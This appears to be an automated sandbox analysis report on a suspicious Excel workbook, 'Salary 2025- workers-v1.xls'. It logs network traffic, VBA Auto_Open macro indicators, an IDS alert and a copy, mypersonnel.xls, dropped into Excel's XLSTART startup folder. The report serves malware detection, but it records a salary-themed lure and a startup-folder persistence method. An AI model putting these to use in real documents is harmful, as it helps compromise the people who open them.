Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49716 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49716
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 192.168.2.16:49717 -> 13.107.246.42:443
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717
Source: global traffic	TCP traffic: 13.107.246.42:443 -> 192.168.2.16:49717

Source: excel.exe

Memory has grown: Private usage: 1MB later: 130MB

Source: Joe Sandbox View

IP Address: 13.107.246.42 13.107.246.42

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 13.107.246.42:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 13.107.246.42:443

Source: global traffic	HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net

Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown

HTTPS traffic detected: 13.107.246.42:443 -> 192.168.2.16:49716 version: TLS 1.2

Source: Salary 2025- workers-v1.xls	OLE, VBA macro line: Sub Auto_Open()
Source: mypersonnel.xls.0.dr	OLE, VBA macro line: Sub Auto_Open()

Source: Salary 2025- workers-v1.xls	OLE indicator, VBA macros: true
Source: mypersonnel.xls.0.dr	OLE indicator, VBA macros: true

Source: ~DF7F1A492639213F2D.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal52.winXLS@3/4@0/1

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\mypersonnel.xls

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{81270C32-B525-47BE-A881-FD16D640CB32} - OProcSessId.dat

Jump to behavior

Source: Salary 2025- workers-v1.xls	OLE indicator, Workbook stream: true
Source: mypersonnel.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Salary 2025- workers-v1.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: ~DF7F1A492639213F2D.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
